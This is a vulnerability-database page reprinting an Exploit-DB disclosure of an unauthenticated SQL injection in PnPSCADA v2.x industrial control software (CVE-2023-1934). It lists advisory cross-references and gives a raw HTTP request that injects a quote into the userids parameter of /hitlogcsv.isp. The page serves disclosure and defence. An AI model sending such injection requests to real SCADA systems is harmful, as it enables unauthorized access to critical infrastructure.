PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Vulnerability

🗓️ 23 May 2023 00:00:00Reported by Momen EldawakhlyType

zdt🔗 0day.today👁 207 Views

PnPSCADA v2.x Unauthenticated PostgreSQL Injection CVE-2023-193

Reporter	Title	Published	Views	Family All 13
BDU FSTEC	The vulnerability of the PnPSCADA automation system’s software lies in the lack of protective measures for SQL query structures. This allows attackers to gain unauthorized access to protected information and compromise the system.	7 Jun 202300:00	–	bdu_fstec
Circl	CVE-2023-1934	12 May 202318:27	–	circl
CNNVD	SDG Technologies PnPSCADA SQL注入漏洞	12 May 202300:00	–	cnnvd
CVE	CVE-2023-1934	12 May 202313:18	–	cve
Cvelist	CVE-2023-1934	12 May 202313:18	–	cvelist
Exploit DB	PnPSCADA v2.x - Unauthenticated PostgreSQL Injection	23 May 202300:00	–	exploitdb
EUVD	EUVD-2023-24121	3 Oct 202520:07	–	euvd
ICS	SDG PnPSCADA	12 May 202318:09	–	ics
NVD	CVE-2023-1934	12 May 202314:15	–	nvd
Packet Storm	PnPSCADA 2.x SQL Injection	24 May 202300:00	–	packetstorm

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8

SQLi crashing point:

GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

23 May 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.00443